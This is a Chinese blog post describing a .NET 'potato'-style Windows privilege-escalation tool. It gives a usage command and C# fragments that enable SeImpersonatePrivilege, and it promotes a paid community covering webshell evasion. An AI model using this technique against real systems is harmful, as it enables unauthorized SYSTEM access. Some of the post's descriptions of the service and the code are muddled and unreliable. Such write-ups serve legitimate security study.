.NET 一款利用打印服务漏洞提权的工具

于 2024-07-25 09:45:10 发布
阅读量359 收藏 8
点赞数 8
文章标签: 安全 矩阵 .net web安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/ahhacker86/article/details/140681302
版权

01阅读须知

此文所提供的信息只为网络安全人员对自己所负责的网站、服务器等(包括但不限于)进行检测或维护参考,未经授权请勿利用文章中的技术资料对任何计算机系统进行入侵操作。利用此文所提供的信息而造成的直接或间接后果和损失,均由使用者本人负责。本文所提供的工具仅用于学习,禁止用于其他方面

02基本介绍

Sharp4McpManagementPotato是一款利用Windows Office 365远程打印通知服务(McpManagementService)的漏洞来提升权限的工具。通过该工具,攻击者可以获取SYSTEM级别的系统访问权限。

图片

03使用方法

具体而言,McpManagementService是Windows Office 365的一项服务,通常在注册表路径HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Svchost\McpManagementServiceGroup下注册。该服务存在一个漏洞,允许未经授权的用户通过远程打印通知功能进行权限提升。具体用法如下所示。

Sharp4McpManagementPotato.exe "whoami"

04

编码实现

以下是 Sharp4McpManagementPotato 的主要功能实现代码,通过调用各种子模块来执行具体的数据提取任务,具体代码如下所示。

using (WindowsIdentity current = WindowsIdentity.GetCurrent())
{
    Console.WriteLine("[+] Current user: " + current.Name);
}

使用WindowsIdentity.GetCurrent()方法获取当前用户的身份信息,并输出用户名。接着,通过LookupPrivilegeValue获取SeImpersonatePrivilege权限的本地唯一标识符(LUID),然后配置TOKEN_PRIVILEGES结构体并启用该权限,代码如下所示。

NativeMethods.LookupPrivilegeValue(null, "SeImpersonatePrivilege", out array[0].Luid);
TOKEN_PRIVILEGES structure = default(TOKEN_PRIVILEGES);
structure.PrivilegeCount = 1U;
structure.Privileges = array;
array[0].Attributes = 2U; // SE_PRIVILEGE_ENABLED

使用AdjustTokenPrivileges函数调整当前令牌的权限,启用SeImpersonatePrivilege,具体代码如下所示。

if (!NativeMethods.AdjustTokenPrivileges(current.Token, false, ref structure, Marshal.SizeOf<TOKEN_PRIVILEGES>(structure), IntPtr.Zero, IntPtr.Zero) || Marshal.GetLastWin32Error() != 0)
{
    Console.WriteLine("[x] SeImpersonatePrivilege not held.");
    return;
}

创建一个GUID并基于全局内存创建一个ILockBytes对象。使用StgCreateDocfileOnILockBytes函数创建一个基于ILockBytes对象的IStorage对象。具体代码如下所示。

Guid guid = new Guid("{A9819296-E5B3-4E67-8226-5E72CE9E1FB7}");
ILockBytes iLockBytes = NativeMethods.CreateILockBytesOnHGlobal(IntPtr.Zero, true);
IStorage storage = NativeMethods.StgCreateDocfileOnILockBytes(iLockBytes, 4114, 0);

通过这些步骤,Sharp4McpManagementPotato利用了Windows Office 365远程打印通知服务的漏洞,实现了从普通用户权限到SYSTEM权限的提升。

05.NET安全星球

星球汇聚了各行业安全攻防技术大咖,并且每日分享.NET安全技术干货以及交流解答各类技术等问题,社区中发布很多高质量的.NET安全资源,可以说市面上很少见,都是干货。

图片

图片

20+个专题栏目涵盖了点、线、面、体等知识面,助力师傅们快速成长!其中主题包括.NET Tricks、漏洞分析、内存马、代码审计、预编译、反序列化、webshell免杀、命令执行、C#工具库等等。

图片

图片

我们倾力打造专刊、视频等配套学习资源,循序渐进的方式引导加深安全攻防技术提高以及岗位内推等等服务。

图片

dot.Net安全矩阵
关注
  • 8
    点赞
  • 8
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
Web安全和渗透测试有什么关系?
Python_0011的博客
03-31 405
做渗透测试的一个环节就是测试web安全,需要明白漏洞产生原理,通过信息收集互联网暴露面,进行漏洞扫描,漏洞利用,必要时进行脚本自编写和手工测试,力求挖出目标存在的漏洞并提出整改建议,当然如果技术再精一些,还要学习内网渗透(工作组和域环境),白盒审计,app,小程序渗透那些了......可以说是最科学最系统的学习路线,大家跟着这个大的方向学习准没问题。当然除了有配套的视频,同时也为大家整理了各种文档和书籍资料&工具,并且已经帮大家分好类了。总之,web安全包含于渗透测试,但不是渗透测试的全部。
2024hvv(国护)面试宝典
weixin_64233442的博客
03-02 2707
答:菜刀默认会有eval(用于执行传递的攻击payload)、(base64_decode($_POST[z0])):(base64_decode($_POST[z0]))(将攻击payload进行base64解码)、&z0=QGluaV9zZXQ...(传递攻击payload,此参数z0对应$_POST[z0]接收到的数据,该参数值是使用Base64编码的,所以可以利用base64解码可以看到攻击明文。答:iis、tomcat、apache、nginx、weblogic、jboss、jetty。
2024HVV行动碎碎念_hvv 碰到蜜罐(1),源码解析
2401_84253132的博客
04-16 791
某日上午,接到演习部通知,北部公司有资产沦陷,给出IP,不存在解析域名,但确实挂着公司LOGO,师傅开始了渗透之旅,发现开放3306端口,师傅爆破,竟然是弱口令。啊,不可能吧,会不会是ReadTeam的蜜罐,靠。所以ReadTeamer是这样做的:ReadTeamer进来之后很准确的找到了某盟的态势感知安全设备,由于设置的默认密码,很轻松的登录了某盟的安全运营平台。网上虽然也有很多的学习资源,但基本上都残缺不全的,这是我自己录的网安视频教程,上面路线图的每一个知识点,我都有配套的视频讲解。
2024国家hvv招聘啦!
qq_62169455的博客
03-18 1269
护网行动是以公安部牵头的,用以评估企事业单位的网络安全的活动。具体实践中,公安部会组织攻防两方,进攻方会在一个月内对防守方发动网络攻击,检测出防守方(企事业单位)存在的安全漏洞。“护网行动”从2016年开始,随着我国对网络安全的重视,涉及单位不断扩大,越来越多的单位都加入到护网行动中,网络安全对抗演练越来越贴近实际情况,各机构对待网络安全需求也从被动构建,升级为业务保障刚需。跟踪分析研判监测系统漏洞攻击事件,结合监测数据,确定攻击事件,分析攻击源、攻击时间和漏洞复现验证。薪资:1.3k~3k。
2024HVV | 护网总结报告模板与实例
Python_0011的博客
02-17 1410
5、攻防实施阶段XX平台共检测到恶意扫描攻击XX次,平台封禁恶意IP地址XX余个,公司邮箱账户被尝试爆破XX余个,均未成功,XX平台业务账户被尝试暴力破解XX个,成功X个,VPN账号被尝试暴力破解X个,未成功,发现XX公司官网网站有异常IP入侵,发现XX平台、XX平台有异常IP入侵,采取封禁IP措施,对XX平台网站应用系统弱口令问题进行整改。编制X份防守成果报告,经演戏指挥部确认,得分XX分。XXXX平台作为防守方,成功防御了XX的攻击,没有被攻破,同时发现并处理了XXXX,经XX确认,得分X分。
.net打印控件 无需安装
11-27
总的来说,.NET打印控件是Web开发中的一个重要工具,它提供了一种方便、安全且高效的方法来处理Web页面的打印需求,使得用户可以在不安装额外软件的情况下,享受到定制化的打印服务。通过理解和利用这样的控件,...
asp.net知识库
06-18
将 ASP.NET 2.0 应用程序服务配置为使用 SQL Server 2000 或 SQL Server 2005 ASP.NET 2.0 中的数据源控件 使用 ASP.NET 2.0 ObjectDataSource 控件 ASP.NET 2.0 的内部变化 使用SQL Cache Dependency 代替 ...
酒店客房管理系统(ASP.NET)
02-22
ASP.NET是微软公司推出的Web应用程序框架,它为开发人员提供了一种强大、灵活且高效的工具,用于构建动态、数据驱动的Web应用。 在ASP.NET框架下,该系统可能采用了C#或VB.NET作为编程语言,利用.NET Framework或...
dsoframe.ocx实现远程下载编辑后利用反射回传保存
08-04
标题中的“dsoframe.ocx实现远程下载编辑后利用反射回传保存”涉及到的是一个Windows系统中的ActiveX控件技术,以及恶意代码的传播和执行机制。ActiveX是微软在Internet Explorer浏览器中引入的一种技术,它允许网页...
.net PDF阅读器防下载
05-04
PDF(Portable Document Format)是一种广泛使用的文档格式,它允许用户创建、查看和打印文档,而无需考虑原始软件或硬件环境。在.NET框架下,开发人员经常需要处理PDF文档,包括读取、显示以及防止非法下载。这篇...
hvv蓝队经验收集_awvs的dnslog,2024网络安全面试真题精选干货整理
m0_60635224的博客
04-03 934
本人从事网路安全工作12年,曾在2个大厂工作过,安全服务、售后服务、售前、攻防比赛、安全讲师、销售经理等职位都做过,对这个行业了解比较全面。最近遍览了各种网络安全类的文章,内容参差不齐,其中不伐有大佬倾力教学,也有各种不良机构浑水摸鱼,在收到几条私信,发现大家对一套完整的系统的网络安全从学习路线到学习资料,甚至是工具有着不小的需求。最后,我将这部分内容融会贯通成了一套282G的网络安全资料包,所有类目条理清晰,知识点层层递进,需要的小伙伴可以点击下方小卡片领取哦!
2024HVV | 12款开源渗透测试工具
wuli1024的博客
02-17 1040
回顾过去,黑客入侵异常困难,需要大量手动操作。然而,如今,一套自动化测试工具让渗透测试人员变身“半机械人”,能够比以往任何时候都更轻松地完成更多测试。以下12款开源渗透测试工具,可以帮助渗透测试人员更快、更好、更智能地完成工作。
.NET 矩阵6月红队工具和资源集合
最新发布
ahhacker86的专栏
07-01 517
20+个专题栏目涵盖了点、线、面、体等知识面,助力师傅们快速成长!其中主题包括.NET Tricks、漏洞分析、内存马、代码审计、预编译、反序列化、webshell免杀、命令执行、C#工具库等等。星球汇聚了各行业安全攻防技术大咖,并且每日分享.NET安全技术干货以及交流解答各类技术等问题,社区中发布很多高质量的.NET安全资源,可以说市面上很少见,都是干货。我们倾力打造专刊、视频等配套学习资源,循序渐进的方式引导加深安全攻防技术提高以及岗位内推等等服务。
2024HVV行动-蓝队面试纯干货
Welcome To Myon'Blog !
04-01 1937
冰蝎3.0内置的默认内置16个ua(user-agent)头 content-length 请求长度,对于上传文件,命令执行来讲,加密的参数不定长,但是对于密钥交互,获取基本信息来讲,payload 都为定长。选择默认脚本编码生成的情况下,jsp会出现xc,pass字符和Java反射(ClassLoader,getClass().getClassLoader()),base64加解码等特征,php,asp则为普通的一句话木马。常用函数:if()、length()、substring()、substr()
2024年Python最全Python爬取微博(APP)榜单爬虫及数据可视化(1),面试ng
m0_60635001的博客
05-03 958
Python所有方向的技术点做的整理,形成各个领域的知识点汇总,它的用处就在于,你可以按照下面的知识点去找对应的学习资源,保证自己学得较为全面。工具都帮大家整理好了,安装就可直接上手!当我学到一定基础,有自己的理解能力的时候,会去阅读一些前辈整理的书籍或者手写的笔记资料,这些笔记详细记载了他们对一些技术点的理解,这些理解是比较独到,可以学到不一样的思路。观看全面零基础学习视频,看视频学习是最快捷也是最有效果的方式,跟着视频中老师的思路,从基础到深入,还是很容易入门的。
安全设备篇】HVV面试专题
大河之犬的博客
05-17 6798
还有就是这个可能是被访问的这个内网系统,本身业务系统存在业务逻辑问题,因为内网所布置的很多业务系统往往不会考虑一些安全性问题,比如在正常的业务逻辑请求中直接带了sql语句,就会触发设备规则产生告警,这一类是属于误报,然后会将此告警上报给研判人员,需要研判组专家和甲方客户确认下是否是该系统存在此业务逻辑问题,并且需要确认告警的源ip在此告警的时间段附近有没有进行操作过。天眼日志分析主要基于系统和应用程序的日志数据来识别安全威胁,而威胁感知则通过收集和分析多种来源的情报信息。理解威胁的性质和威胁背后的原理。
【2024版】最新HW参考 | HVV行动之蓝军经验总结(非常详细)零基础入门到精通,收藏这一篇就够了
Python_0011的博客
05-29 1278
但是相当多的二级单位或者中型公司,可能没那么专业,然后听从乙方来忽悠,上一堆设备,上大屏展示,图很酷炫,数字很夸张,每天防守几万次攻击,不是说这些没用,而是首先要立足于将产品和服务用好,比如资产梳理,比如防火墙,waf策略优化,这个应该是甲方最基础的事情,也不应该全部交给乙方,有的单位被忽悠上了态势感知,但是连基本的waf策略也没有优化,报表表面上很客观,实际的攻击含金量很低。4.稳扎稳打,有效联动,快速响应,让自己的各种安全设备发挥出最大效能,敌我双方都有漏洞的情况下,就比谁的的响应快谁响应快谁就赢。
2024年hvv蓝初安全监测一面总结
xhxuhuan的博客
06-20 1468
护网的流程是你的简历,,然后外包很简单,稍微准备都能过。他们就是确定你懂不懂网安知识,别把你简历投给厂商因为啥都不会被厂商骂了。厂商就稍微难点,毕竟要你上岗。问的更深入。外包公司一般都是电话面试,而厂商有两种,或面完就可以上岗了。
Python pyecharts Boxplot图
m0_57472099的博客
04-26 794
现在能在网上找到很多很多的学习资源,有免费的也有收费的,当我拿到1套比较全的学习资源之前,我并没着急去看第1节,我而是去审视这套资源是否值得学习,有时候也会去问一些学长的意见,如果可以之后,我会对这套学习资源做1个学习计划,我的学习计划主要包括规划图和学习进度表。分享给大家这份我薅到的免费视频资料,质量还不错,大家可以跟着学习。
"ASP.NET 2.0 服务器控件C: 开发简化工具
ASP.NET 2.0 服务器控件C是一个用于构建动态网页的强大工具。它提供了一种简单而又高效的方式来创建交互式和动态的网页内容,使得开发人员可以轻松地构建出各种复杂的网站应用程序。该控件库在.NET框架下运行,并且...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值